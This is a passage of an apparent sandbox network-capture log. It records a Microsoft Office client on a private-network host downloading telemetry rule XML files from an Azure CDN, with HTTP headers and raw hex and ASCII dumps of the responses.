                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                            ETag: "0x8DC582BDC681E17"
                                                                            x-ms-request-id: c2e82b32-d01e-005a-2b27-267fd9000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083718Z-17c5cb586f6wnfhvhw6gvetfh40000000490000000001d8k
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:18 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            122192.168.2.44989613.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:18 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:18 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:18 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1393
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                            x-ms-request-id: 0243abe0-001e-0028-29fb-25c49f000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083718Z-15b8d89586f5s5nz3ffrgxn5ac00000005c00000000062v0
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:18 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            123192.168.2.44989413.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:18 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:18 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:18 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1393
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                            x-ms-request-id: 98c82924-f01e-0020-04fc-26956b000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083718Z-r197bdfb6b4zd9tpkpdngrtchw00000004100000000059dd
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:18 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            124192.168.2.44989713.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:18 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:18 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:18 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1356
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                            ETag: "0x8DC582BDF66E42D"
                                                                            x-ms-request-id: 2e99a458-901e-0067-29ae-26b5cb000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083718Z-15b8d89586f42m673h1quuee4s00000008u0000000005nmk
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:18 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            125192.168.2.44990013.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:19 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:19 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:19 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1395
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                            ETag: "0x8DC582BDE12A98D"
                                                                            x-ms-request-id: 3c823cf0-801e-00a3-6533-267cfb000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083719Z-15b8d89586ff5l62aha9080wv0000000064g000000000hdk
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:19 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            126192.168.2.44989913.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:19 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:19 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:19 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1358
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                            ETag: "0x8DC582BE6431446"
                                                                            x-ms-request-id: 3a0fb8a5-701e-0050-6930-276767000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083719Z-16849878b7828dsgct3vrzta700000000370000000006m7n
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:19 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            127192.168.2.44990113.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:19 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:19 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:19 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1358
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                            ETag: "0x8DC582BE022ECC5"
                                                                            x-ms-request-id: 255ed8c5-301e-0051-461c-2738bb000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083719Z-16849878b78smng4k6nq15r6s400000006c00000000023q7
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:19 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            128192.168.2.44990213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:19 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:19 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:19 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1389
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                            x-ms-request-id: 082c7638-801e-0067-65f2-24fe30000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083719Z-15b8d89586fzhrwgk23ex2bvhw00000007p0000000000g0a
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:19 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            129192.168.2.44990613.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:20 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:20 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:20 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1401
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                            ETag: "0x8DC582BE055B528"
                                                                            x-ms-request-id: 04bfc9b2-001e-0017-54ad-260c3c000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083720Z-16849878b78z2wx67pvzz63kdg00000003a000000000df38
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:20 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            130192.168.2.44990413.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:20 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:20 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:20 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1405
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                            ETag: "0x8DC582BE12B5C71"
                                                                            x-ms-request-id: cdf7bdf1-501e-0029-3f94-27d0b8000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083720Z-17c5cb586f6lxnvg801rcb3n8n00000004gg00000000485z
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:20 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            131192.168.2.44990313.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:20 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:20 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:20 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1352
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                            x-ms-request-id: 174e4ed1-f01e-0052-3d1b-279224000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083720Z-16849878b78bjkl8dpep89pbgg00000003gg000000004xg4
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
